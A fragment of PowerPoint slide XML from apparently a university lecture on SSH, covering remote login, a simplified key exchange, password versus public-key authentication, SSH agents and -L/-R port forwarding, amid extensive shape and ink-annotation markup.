                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2747553" y="3607672"/>
                <a:ext cx="239760" cy="186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F779845-81FD-104A-AC29-206E73F13A2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738913" y="3599032"/>
                  <a:ext cx="2574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FE67266-8719-3642-BC4D-7BEFC13D980D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2986953" y="3356392"/>
                <a:ext cx="167760" cy="317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FE67266-8719-3642-BC4D-7BEFC13D980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978313" y="3347392"/>
                  <a:ext cx="1854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965D7C3-5869-874E-9843-A68E299A0743}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2914593" y="3480952"/>
                <a:ext cx="218880" cy="38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965D7C3-5869-874E-9843-A68E299A074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905953" y="3471952"/>
                  <a:ext cx="2365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986C0B4-470E-BD44-80AE-0323E7B6DF41}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3274953" y="3552232"/>
                <a:ext cx="219960" cy="182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986C0B4-470E-BD44-80AE-0323E7B6DF4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265953" y="3543232"/>
                  <a:ext cx="2376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2AB5FF6-AE5B-2240-9F2F-7D8882AF14C8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3372873" y="3300592"/>
                <a:ext cx="937800" cy="529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2AB5FF6-AE5B-2240-9F2F-7D8882AF14C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363873" y="3291592"/>
                  <a:ext cx="95544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DE5EC0A-12BA-E743-A7BE-6F77B6785649}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4920153" y="2608312"/>
            <a:ext cx="885600" cy="74880"/>
            <a:chOff x="4920153" y="2608312"/>
            <a:chExt cx="885600" cy="7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6D6D35D-AAAF-6240-8C8C-0EFDAE226A7D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4920153" y="2619472"/>
                <a:ext cx="24912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6D6D35D-AAAF-6240-8C8C-0EFDAE226A7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911153" y="2610832"/>
                  <a:ext cx="266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A712AC2-DC5A-9248-ACE0-C518A2CD6496}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5368353" y="2608312"/>
                <a:ext cx="33048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A712AC2-DC5A-9248-ACE0-C518A2CD649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59353" y="2599312"/>
                  <a:ext cx="348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7B88A8A-83C3-F340-97A1-B8E3E0B11EE6}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5347473" y="2682832"/>
                <a:ext cx="45828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7B88A8A-83C3-F340-97A1-B8E3E0B11EE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338833" y="2674192"/>
                  <a:ext cx="47592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40397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Speaking of SSH…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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> allows remote login, remote command execution, and TCP tunnels, all with strong encryption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moxie.cs.colorado.edu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-l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jrblack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jrblack@moxie.cs.colorado.edu's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password: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moxie.cs.colorado.edu -l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jrblack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ls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Gives me </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of my home dir on moxie, then logs out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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is using symmetric and asymmetric crypto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protocol (oversimplified)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2133600" y="2895600"/>
            <a:ext cx="403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66800" y="1828800"/>
            <a:ext cx="70564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72200" y="1752600"/>
            <a:ext cx="79040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05000" y="2133600"/>
            <a:ext cx="403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09800" y="1752600"/>
            <a:ext cx="155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want to log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71800" y="2438400"/>
            <a:ext cx="3628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/etc/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ssh_host_rsa_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = S_{pub}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33600" y="4265612"/>
            <a:ext cx="403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" y="3087469"/>
            <a:ext cx="274320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Check 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known_hosts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>session_key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33600" y="3897868"/>
            <a:ext cx="330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RSAenc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(S_{pub}, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>session_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)=C1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62600" y="4431268"/>
            <a:ext cx="3461782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RSAdec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(S_{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}, C1) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>session_key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rot="10800000">
            <a:off x="2133600" y="5484811"/>
            <a:ext cx="403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68747" y="5040868"/>
            <a:ext cx="364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AES-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CBCenc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>session_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tst-msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)=C2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2400" y="5754469"/>
            <a:ext cx="274320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AES-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CBCdec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>session_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, C2) == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tst-msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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71800" y="6059269"/>
            <a:ext cx="27432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All further communication done with AES-CBC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Password-Based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Most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> authentication is password-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But passwords are, in general, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No built-in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>brute-force prevention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, which is not an easy thing in general to provide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All the other bad things about passwords apply</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Guessable, shared, lost/stolen, shoulder surfed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>One-time passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can help, but not perfect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Real Hackers™ use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>public-key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> authentication for SSH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User generates a key-pair, deposits public key on server and carries private key around with her/him</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSH then uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>challenge-response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> protocol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Public-Key SSH Auth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User’s private key should be protected by a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passphrase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Doesn’t that just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>degenerate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>first</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> scenario again?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Might get tired of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>typing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in a passphrase every time, right?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SSH Agents </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are often used to ameliorate the pain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An agent is a daemon that takes your passphrase, obtains the private key, then serves it on a local named pipe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Port-Forwarding (Tunneling) with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh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Suppose I want to expose a service within a private network, and I don’t want </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ppl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to sniff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="18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-L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localport:servicehost:serviceport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remotehost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This creates a listening port (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>localport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) on my </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>localhost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Connections to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localhost:localport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> will be forwarded to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servicehost:serviceport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and all communication will be encrypted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>servicehost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> must be accessible from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>remotehost</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can also open a remote listening port with -R </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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-R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remoteport:servicehost:serviceport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remotehost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000" dirty="0"/>
              <a:t>This creates a listening port (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>remoteport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) owned by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>remotehost</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Connections 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remotehost:remoteport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> will be forwarded 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servicehost:serviceport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and all communication will be encrypted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>servicehost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> must be accessible from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US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84EF0-7748-064B-92D7-3CEA95B75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D6FE63-5B45-6442-AAD8-17303C3C1D94}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="614913" y="1897312"/>
              <a:ext cx="680040" cy="592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D6FE63-5B45-6442-AAD8-17303C3C1D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5913" y="1888312"/>
                <a:ext cx="697680" cy="61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A0FFC83-C2F9-B342-A608-DA3CFA4B1100}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="694833" y="2538472"/>
              <a:ext cx="743400" cy="257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A0FFC83-C2F9-B342-A608-DA3CFA4B11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6193" y="2529832"/>
                <a:ext cx="76104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ADE9F63-885A-EA4F-8D0A-54FA26D6E9B2}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1317273" y="2376832"/>
              <a:ext cx="442800" cy="443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ADE9F63-885A-EA4F-8D0A-54FA26D6E9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08633" y="2367832"/>
                <a:ext cx="46044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AB773BE-5208-194A-AB88-12A9CDC5708E}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="596553" y="2938432"/>
              <a:ext cx="31680" cy="494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AB773BE-5208-194A-AB88-12A9CDC5708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7553" y="2929432"/>
                <a:ext cx="4932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1C2F956-622A-334F-8CCF-BB480108F365}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="619593" y="3101512"/>
              <a:ext cx="206280" cy="3772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1C2F956-622A-334F-8CCF-BB480108F36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0953" y="3092512"/>
                <a:ext cx="22392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EFCA03A-EF3A-EF4B-9257-DC05562A7BC3}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="892473" y="3030232"/>
              <a:ext cx="419040" cy="375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EFCA03A-EF3A-EF4B-9257-DC05562A7BC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3473" y="3021232"/>
                <a:ext cx="43668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36CAF11-A403-0D4B-B110-B9E2CAFDA346}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1277313" y="3083512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36CAF11-A403-0D4B-B110-B9E2CAFDA34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68673" y="307451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D4C7A83A-DF5B-9F44-9F15-C55C9CFC0462}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1989033" y="2776792"/>
            <a:ext cx="6077160" cy="1330200"/>
            <a:chOff x="1989033" y="2776792"/>
            <a:chExt cx="6077160" cy="133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D404CF7-723A-4442-A99F-03012E3610BF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6150993" y="3386992"/>
                <a:ext cx="4320" cy="513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D404CF7-723A-4442-A99F-03012E3610B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41993" y="3378352"/>
                  <a:ext cx="21960" cy="53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B2B6288-DC02-3A41-AF30-AB433B650391}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6112473" y="3357832"/>
                <a:ext cx="703440" cy="495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B2B6288-DC02-3A41-AF30-AB433B65039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103833" y="3348832"/>
                  <a:ext cx="72108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D74AE86-85A3-044F-80E6-4F5509C94DBF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6121473" y="3010072"/>
                <a:ext cx="716760" cy="401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D74AE86-85A3-044F-80E6-4F5509C94DB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112473" y="3001072"/>
                  <a:ext cx="73440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79A2A13-1715-F04F-AC9F-AD3CF87F9C70}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6820233" y="3140032"/>
                <a:ext cx="93240" cy="613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79A2A13-1715-F04F-AC9F-AD3CF87F9C7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11233" y="3131392"/>
                  <a:ext cx="110880" cy="63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2F41681-F367-2E4D-9117-9DE3DBBA35EA}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6951993" y="2823592"/>
                <a:ext cx="242640" cy="326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2F41681-F367-2E4D-9117-9DE3DBBA35E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42993" y="2814592"/>
                  <a:ext cx="26028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1C99292-A704-C242-8029-1DD3AC84C801}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7314153" y="2876152"/>
                <a:ext cx="122400" cy="225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1C99292-A704-C242-8029-1DD3AC84C80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305153" y="2867152"/>
                  <a:ext cx="1400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F5B71DF-3EEC-5240-AA5C-91E3EBB15FCF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7489473" y="2892352"/>
                <a:ext cx="190080" cy="106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F5B71DF-3EEC-5240-AA5C-91E3EBB15FC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480833" y="2883712"/>
                  <a:ext cx="2077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262F043-7F2A-4C40-A59D-7366FF48E3C0}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7563273" y="2800192"/>
                <a:ext cx="100800" cy="272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262F043-7F2A-4C40-A59D-7366FF48E3C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554273" y="2791552"/>
                  <a:ext cx="1184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2169329-0BBD-B648-8EF1-4F82A8B86A76}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7770993" y="2850592"/>
                <a:ext cx="360" cy="158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2169329-0BBD-B648-8EF1-4F82A8B86A7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761993" y="2841952"/>
                  <a:ext cx="180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059647B-CF90-ED43-84AD-B34D237A351A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7770993" y="2776792"/>
                <a:ext cx="360" cy="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059647B-CF90-ED43-84AD-B34D237A351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61993" y="27681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36F2B7A-E58D-DA42-AEB0-F42907EA2D1F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7900593" y="2803432"/>
                <a:ext cx="165600" cy="244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36F2B7A-E58D-DA42-AEB0-F42907EA2D1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891953" y="2794792"/>
                  <a:ext cx="1832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4128894-335B-6741-8E18-246E16605AF4}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1989033" y="3196552"/>
                <a:ext cx="3618720" cy="774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4128894-335B-6741-8E18-246E16605AF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980393" y="3187552"/>
                  <a:ext cx="3636360" cy="79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99C052A-E22B-B843-89A5-5372056B12B5}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5460153" y="3797032"/>
                <a:ext cx="258840" cy="309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99C052A-E22B-B843-89A5-5372056B12B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451513" y="3788032"/>
                  <a:ext cx="276480" cy="32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2D8A3D3-AB98-124F-BD41-1DD3E4768761}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6893673" y="5353312"/>
              <a:ext cx="254880" cy="3798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2D8A3D3-AB98-124F-BD41-1DD3E476876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885033" y="5344672"/>
                <a:ext cx="272520" cy="39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F987D88C-A94C-494D-A5F4-98BF988C7451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7180593" y="5024272"/>
            <a:ext cx="946800" cy="686880"/>
            <a:chOff x="7180593" y="5024272"/>
            <a:chExt cx="946800" cy="68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E582768-130E-AF4A-8437-2294AAE149A8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7180593" y="5263312"/>
                <a:ext cx="131760" cy="146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E582768-130E-AF4A-8437-2294AAE149A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171953" y="5254312"/>
                  <a:ext cx="1494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534F693-C7D0-5C49-8CB1-29DBE51539FC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7331433" y="5258992"/>
                <a:ext cx="137880" cy="212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534F693-C7D0-5C49-8CB1-29DBE51539F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322433" y="5250352"/>
                  <a:ext cx="1555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10E7FD2-5AF1-2E49-AAD3-C51BF84C86A2}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7552833" y="5024272"/>
                <a:ext cx="574560" cy="686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10E7FD2-5AF1-2E49-AAD3-C51BF84C86A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543833" y="5015632"/>
                  <a:ext cx="592200" cy="70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BD790A5-D39E-5B40-94FF-AD1E1F092E04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6856593" y="4038952"/>
            <a:ext cx="353880" cy="941040"/>
            <a:chOff x="6856593" y="4038952"/>
            <a:chExt cx="353880" cy="94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3ADEF25-464F-8040-893C-6FBF5068BA12}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6856593" y="4038952"/>
                <a:ext cx="317160" cy="941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3ADEF25-464F-8040-893C-6FBF5068BA1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847953" y="4030312"/>
                  <a:ext cx="334800" cy="9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AEF05FB-D05A-F547-9F58-55180ACD186A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7048113" y="4698112"/>
                <a:ext cx="162360" cy="2541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AEF05FB-D05A-F547-9F58-55180ACD186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039113" y="4689112"/>
                  <a:ext cx="180000" cy="271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0442610-152E-4A43-B8CC-B7BDF0BCE12E}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6842193" y="3994672"/>
              <a:ext cx="172440" cy="2016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0442610-152E-4A43-B8CC-B7BDF0BCE12E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833193" y="3986032"/>
                <a:ext cx="190080" cy="21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9C9C05B1-BFFC-4343-89A8-058F69CFBD87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8306673" y="5464912"/>
            <a:ext cx="296640" cy="263520"/>
            <a:chOff x="8306673" y="5464912"/>
            <a:chExt cx="296640" cy="26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B3C91FD-7B9F-AD4F-915C-9B9C44955664}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8306673" y="5464912"/>
                <a:ext cx="145440" cy="263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B3C91FD-7B9F-AD4F-915C-9B9C4495566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298033" y="5456272"/>
                  <a:ext cx="1630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F8C420D-9C55-F740-9316-3EB7D04FD273}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8489193" y="5547712"/>
                <a:ext cx="114120" cy="1429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F8C420D-9C55-F740-9316-3EB7D04FD27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480553" y="5538712"/>
                  <a:ext cx="131760" cy="16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ADA352F-3350-7941-9AE7-49A3BAE293FB}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
